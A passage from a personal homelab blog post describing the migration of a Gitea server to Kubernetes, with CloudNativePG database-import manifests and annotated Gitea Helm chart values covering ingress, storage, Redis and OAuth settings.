</span></span><span style="display:flex;"><span>      <span style="color:#f92672">destinationPath</span>: <span style="color:#e6db74">&#34;s3://backup-cnpg/&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">accessKeyId</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-cnpg-backup-gitea</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretAccessKey</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-cnpg-backup-gitea</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">retentionPolicy</span>: <span style="color:#e6db74">&#34;30d&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">externalClusters</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nomad-pg</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">connectionParameters</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">host</span>: <span style="color:#ae81ff">ingress-internal.service.consul</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">port</span>: <span style="color:#e6db74">&#34;5577&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">user</span>: <span style="color:#ae81ff">gogs</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dbname</span>: <span style="color:#ae81ff">gitea</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">password</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">olddb-secret</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">pw</span>
</span></span></code></pre></div><p>I&rsquo;ve omitted some standard things like the backup bucket setup here. The important
parts for the migration are the <code>spec.bootstrap.initdb.import</code> and <code>spec.externalClusters</code>
keys.</p>
<p>Let&rsquo;s start with the <code>externalClusters</code> definition. It&rsquo;s documented <a href="https://cloudnative-pg.io/documentation/1.25/bootstrap/#the-externalclusters-section">here</a> and describes the connection to another cluster. This doesn&rsquo;t need to be
a CNPG cluster. One problem was that there seems to be no documentation for the
<code>externalClusters.connectionParameters.port</code> option. I spent quite a while
trying to figure out whether the port was supposed to go on the end of the <code>host</code>
parameter, or whether it was a separate key.
I was finally saved by the fact that CNPG is open source, and so I could look
at the code - specifically a Yaml file from their test setup <a href="https://github.com/cloudnative-pg/cloudnative-pg/blob/62d48282bdd4c640d1af104b9cf637087148075e/tests/e2e/fixtures/replica_mode_cluster/cluster-replica-tls.yaml.template#L22">here</a>.
The password for the connection was coming from a Secret with the old database
credentials. As you can see in the <code>user</code> parameter, the Gitea database was
originally created during the Gogs phase of my Git hosting. &#x1f601;</p>
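<p>So in case anyone else is searching for the same thing: the port goes into its own
key next to <code>host</code>, as in this trimmed-down excerpt of the manifest above:</p>
<pre tabindex="0"><code>externalClusters:
  - name: nomad-pg
    connectionParameters:
      host: ingress-internal.service.consul
      port: &#34;5577&#34;
      user: gogs
      dbname: gitea
    password:
      name: olddb-secret
      key: pw
</code></pre>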
<p>The second part of the config is in <code>spec.bootstrap.initdb.import</code>, which tells
CNPG what it should import from the external cluster.
The first choice to make here is the <code>type</code> of the import. This describes the
destination cluster, meaning the new CNPG cluster. The choices are <code>microservice</code>,
meaning that the cluster serves only one app with one user, or <code>monolith</code>,
meaning a cluster hosting the databases of multiple services.
Besides that, I just needed to provide the name of the database in the source
cluster and the name of said cluster in the <code>externalClusters</code> list.</p>
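<p>For contrast, a <code>monolith</code> import would look roughly like the sketch below,
listing several databases (and optionally roles) to pull over in one go. The names here
are placeholders, so check the import docs linked above for the exact semantics:</p>
<pre tabindex="0"><code>bootstrap:
  initdb:
    import:
      type: monolith
      databases:
        - gitea
        - someotherapp
      roles:
        - gitea
        - someotherapp
      source:
        externalCluster: nomad-pg
</code></pre>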
<p>This import, as configured above, worked immediately. I was very positively
surprised. All data was imported properly, and CNPG automatically created the
customary Secret with the connection details and credentials for accessing
the cluster.
After the initial import, I was able to remove the <code>spec.bootstrap.initdb.import</code>
and <code>externalClusters</code> keys completely from the manifest without any error.</p>
<h2 id="helm-chart">Helm Chart</h2>
<p>For the Gitea deployment itself, I made use of the <a href="https://gitea.com/gitea/helm-chart">official Helm chart</a>.
It is one of the better ones I&rsquo;ve encountered since starting the migration,
providing the ability to set config options in the <code>values.yaml</code> instead of
having to maintain a separate <code>app.ini</code> file. What I value extremely highly
is that they provide the ability to add environment variables via <code>env.ValueFrom</code>,
so I can directly use the automatically created Secrets from CNPG for the DB
and Rook Ceph for the S3 bucket. This saves me the roundabout setup I had to do
for other charts, where I had to use external-secrets to template the auto-generated
Secrets into new Secrets with a different format to conform to the Chart&rsquo;s
expectations.</p>
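<p>As a sketch of what I mean, an entry in the <code>values.yaml</code> looks roughly like
this. The Secret name follows CNPG&rsquo;s <code>&lt;cluster&gt;-app</code> convention, but the
exact chart key for extra environment variables and the Secret&rsquo;s key names are from
memory, so double-check them against the chart&rsquo;s README and the Secret CNPG actually
created:</p>
<pre tabindex="0"><code>deployment:
  env:
    # DB password taken straight from the Secret CNPG created for the cluster
    - name: GITEA__database__PASSWD
      valueFrom:
        secretKeyRef:
          name: gitea-pg-cluster-app
          key: password
</code></pre>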
<p>One downside at the time of writing is that the chart is not on the newest
Gitea version 1.23.1. But I just changed the image tag and chart version 10.6.0
worked without issue.
Going by <a href="https://gitea.com/gitea/helm-chart/issues/783">this issue</a>, the
delay is simply due to some internal refactoring of the chart they want to finish
before the next release.</p>
<p>I will split the exploration of my <code>values.yaml</code> file into two parts, one with
the Gitea config under the <code>gitea</code> key and one for everything else.</p>
<h3 id="everything-besides-the-gitea-config">Everything besides the Gitea config</h3>
<p>Let&rsquo;s start with the &ldquo;everything else&rdquo; part:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">replicaCount</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">image</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">rootless</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tag</span>: <span style="color:#e6db74">&#34;1.23.1&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">Recreate</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">containerSecurityContext</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">add</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">SYS_CHROOT</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">service</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ssh</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#ae81ff">LoadBalancer</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">port</span>: <span style="color:#ae81ff">2222</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">externalTrafficPolicy</span>: <span style="color:#ae81ff">Local</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#ae81ff">git.example.com</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/public-service</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">traefik.ingress.kubernetes.io/router.entrypoints</span>: <span style="color:#ae81ff">very-safe-entrypoint</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">hosts</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">host</span>: <span style="color:#ae81ff">gitea.example.com</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">paths</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">pathType</span>: <span style="color:#ae81ff">Prefix</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tls</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">hosts</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">gitea.example.com</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">1500Mi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">persistence</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">create</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">mount</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">gitea-data-volume</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">signing</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">actions</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">redis-cluster</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">postgresql-ha</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">postgresql</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>As I noted above, I had to hardcode the Gitea tag for now, because the newest
chart version is still on 1.22.3. I also opted for using the rootless image,
which I did not use in the Nomad job. It&rsquo;s just a little bit nicer than
having a root-capable image, although Gitea automatically drops root privileges
at startup and even with the root image, Gitea doesn&rsquo;t actually run as root.</p>
<p>I also had to hardcode the update strategy to <code>Recreate</code>. I&rsquo;m not sure why
it&rsquo;s set to rolling updates by default. This doesn&rsquo;t really work, because
Gitea is launched in a Deployment with a PVC mounted, so during a rolling update
the newly started instance can&rsquo;t come up, because the RWO volume can&rsquo;t be mounted
in two Pods at the same time.</p>
<p>Then comes an important one, the <code>SYS_CHROOT</code> capability. This is documented as
required when using <a href="https://cri-o.io/">cri-o</a> as the container runtime in the
Helm chart&rsquo;s extensive <a href="https://gitea.com/gitea/helm-chart/src/tag/v10.6.0/README.md">README.md</a>.</p>
<p>External access is split between two different subdomains, one for Gitea&rsquo;s web
frontend going through my Traefik ingress and one for git access with SSH. I
like setting my LoadBalancer services, <a href="https://blog.mei-home.net/posts/k8s-migration-2a-cilium-bgp/">provided by Cilium</a>,
to the Local <code>externalTrafficPolicy</code>. This ensures that the client IPs those
services see are the actual client IPs, and not the IP of the machine which
received the request and forwarded it to the service it was intended for.
The <code>homelab/public-service</code> label is simply a sign for Cilium that it should
handle the service.</p>
<p>The ingress config has one important point, the <code>tls</code> key. I initially did not
set that key, because I&rsquo;ve never set it before - my Traefik automatically
uses HTTPS and I&rsquo;m using a wildcard cert. But Gitea needs to generate publicly
addressable URLs for some things, e.g. when providing HTTPS clone URLs or
callback URLs in webhooks, for example for Woodpecker.
The domain itself is fine, but the chart determines the protocol like this:</p>
<pre tabindex="0"><code>{{- define &#34;gitea.public_protocol&#34; -}}
{{- if and .Values.ingress.enabled (gt (len .Values.ingress.tls) 0) -}}
https
{{- else -}}
{{ .Values.gitea.config.server.PROTOCOL }}
{{- end -}}
{{- end -}}
</code></pre><p>In there, <code>https</code> is only set as the protocol if the <code>ingress.tls</code> list has at
least one entry. And setting the <code>server.PROTOCOL</code> config comes with its own
problems, so I decided to just add the <code>tls.hosts</code> setting, even if it means
that I have to repeat my Gitea domain a number of times in the <code>config.yaml</code>.</p>
<p>For the <code>persistence</code> setting I had to go with a pre-created volume, because
I had to make the migrated Gitea data available. One thing to note here is
that you should delete the <code>app.ini</code> file your previous setup might have left
on the disk. The init container which puts together the <code>app.ini</code> from the
values and env variables and so on doesn&rsquo;t handle it well when there&rsquo;s an
existing <code>app.ini</code> it didn&rsquo;t create itself.</p>
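<p>For completeness, the pre-created volume is just an ordinary PVC along these lines;
the size and storage class are only meant as an illustration of my setup, not a
recommendation:</p>
<pre tabindex="0"><code>apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: gitea-data-volume
spec:
  accessModes:
    - ReadWriteOnce
  storageClassName: rbd-fast
  resources:
    requests:
      storage: 10Gi
</code></pre>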
<p>I also disabled a number of features I didn&rsquo;t need, like signing or actions
or the Redis and Postgres instances the Helm chart can deploy, because I&rsquo;ve
already got my own deployments.</p>
<h3 id="the-gitea-config">The Gitea config</h3>
<p>Here&rsquo;s the full <code>gitea:</code> section of the <code>config.yaml</code>, just for reference. I
will post the relevant subsections as I go over them:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">gitea</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">admin</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">existingSecret</span>: <span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>: <span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">password</span>: <span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metrics</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">oauth</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;Keycloak&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">provider</span>: <span style="color:#e6db74">&#34;openidConnect&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">existingSecret</span>: <span style="color:#ae81ff">oidc-credentials</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">autoDiscoverUrl</span>: <span style="color:#e6db74">&#34;https://key.example.com/realms/homelab/.well-known/openid-configuration&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">APP_NAME</span>: <span style="color:#e6db74">&#34;My Gitea&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">RUN_MODE</span>: <span style="color:#e6db74">&#34;prod&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">server</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SSH_SERVER_HOST_KEYS</span>: <span style="color:#e6db74">&#34;ssh/gitea.ed25519&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">APP_DATA_PATH</span>: <span style="color:#e6db74">&#34;/data/gitea_data&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SSH_DOMAIN</span>: <span style="color:#e6db74">&#34;git.example.com&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SSH_PORT</span>: <span style="color:#ae81ff">2222</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">database</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DB_TYPE</span>: <span style="color:#e6db74">&#34;postgres&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">LOG_SQL</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">oauth2</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">service</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DISABLE_REGISTRATION</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">REQUIRE_SIGNIN_VIEW</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_KEEP_EMAIL_PRIVATE</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_ALLOW_CREATE_ORGANIZATION</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_ORG_VISIBILITY</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_ORG_MEMBER_VISIBLE</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_ENABLE_TIMETRACKING</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SHOW_REGISTRATION_BUTTON</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">repository</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ROOT</span>: <span style="color:#e6db74">&#34;/data/git-repos&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCRIPT_TYPE</span>: <span style="color:#ae81ff">bash</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_PRIVATE</span>: <span style="color:#ae81ff">private</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_BRANCH</span>: <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ui</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_THEME</span>: <span style="color:#ae81ff">gitea-auto</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">queue</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">TYPE</span>: <span style="color:#ae81ff">redis</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">CONN_STR</span>: <span style="color:#e6db74">&#34;addr=redis.redis.svc.cluster.local:6379&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">WORKERS</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">BOOST_WORKERS</span>: <span style="color:#ae81ff">5</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">admin</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_EMAIL_NOTIFICATIONS</span>: <span style="color:#ae81ff">disabled</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">openid</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLE_OPENID_SIGNIN</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">webhook</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ALLOWED_HOST_LIST</span>: <span style="color:#ae81ff">private</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mailer</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SUBJECT_PREFIX</span>: <span style="color:#e6db74">&#34;[Gitea]&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SMTP_ADDR</span>: <span style="color:#ae81ff">mail.example.com</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SMTP_PORT</span>: <span style="color:#e6db74">&#34;465&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">FROM</span>: <span style="color:#e6db74">&#34;gitea@example.com&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">USER</span>: <span style="color:#e6db74">&#34;gitea@example.com&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cache</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ADAPTER</span>: <span style="color:#e6db74">&#34;redis&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">INTERVAL</span>: <span style="color:#ae81ff">60</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">HOST</span>: <span style="color:#e6db74">&#34;network=tcp,addr=redis.redis.svc.cluster.local:6379,db=0,pool_size=100,idle_timeout=180&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ITEM_TTL</span>: <span style="color:#ae81ff">7d</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">session</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">PROVIDER</span>: <span style="color:#ae81ff">redis</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">PROVIDER_CONFIG</span>: <span style="color:#ae81ff">network=tcp,addr=redis.redis.svc.cluster.local:6379,db=0,pool_size=100,idle_timeout=180</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">time</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_UI_LOCATION</span>: <span style="color:#e6db74">&#34;Europe/Berlin&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.archive_cleanup</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCHEDULE</span>: <span style="color:#e6db74">&#34;@every 24h&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.update_mirrors</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.repo_health_check</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCHEDULE</span>: <span style="color:#e6db74">&#34;0 30 5 * * *&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">TIMEOUT</span>: <span style="color:#e6db74">&#34;5m&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.check_repo_stats</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCHEDULE</span>: <span style="color:#e6db74">&#34;0 0 5 * * *&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.update_migration_poster_id</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCHEDULE</span>: <span style="color:#e6db74">&#34;@every 24h&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.sync_external_users</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCHEDULE</span>: <span style="color:#e6db74">&#34;@every 24h&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">UPDATE_EXISTING</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.deleted_branches_cleanup</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCHEDULE</span>: <span style="color:#e6db74">&#34;@every 24h&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">migrations</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ALLOW_LOCALNETWORKS</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">packages</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">STORAGE_TYPE</span>: <span style="color:#ae81ff">minio</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">MINIO_ENDPOINT</span>: <span style="color:#ae81ff">rook-ceph-rgw-rgw-bulk.rook-cluster.svc:80</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">MINIO_LOCATION</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">MINIO_USE_SSL</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">additionalConfigFromEnvs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA__DATABASE__HOST</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gitea-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA__DATABASE__NAME</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gitea-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">dbname</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA__DATABASE__USER</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gitea-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">user</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA__DATABASE__PASSWD</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gitea-pg-cluster-app</span>
